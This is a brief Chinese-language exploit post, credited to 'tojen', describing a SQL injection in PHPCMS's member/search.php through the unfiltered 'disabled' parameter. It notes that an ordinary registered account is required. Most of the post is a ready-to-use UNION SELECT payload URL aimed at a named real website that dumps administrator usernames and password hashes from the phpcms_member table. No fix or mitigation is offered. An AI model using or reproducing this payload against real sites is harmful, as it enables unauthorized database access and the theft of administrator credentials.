作者:tojen
member/search.php中的disabled未处理导致可以注入:
注入过程由于需要一定的权限才可以搜索用户,所以需要注册一个一般的用户
dosubmit=%C1%A2%BC%B4%CB%D1%CB%F7&mod=member&file=&action=&disabled=0/**/and/**/1=2/**/union/**/select/**/1,username,3,4">http://www.worldream.net.cn/member/search.php?username=admin&dosubmit=%C1%A2%BC%B4%CB%D1%CB%F7&mod=member&file=&action=&disabled=0/**/and/**/1=2/**/union/**/select/**/1,username,3,4,
password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%20from%20phpcms_member%20where%20groupid=1/*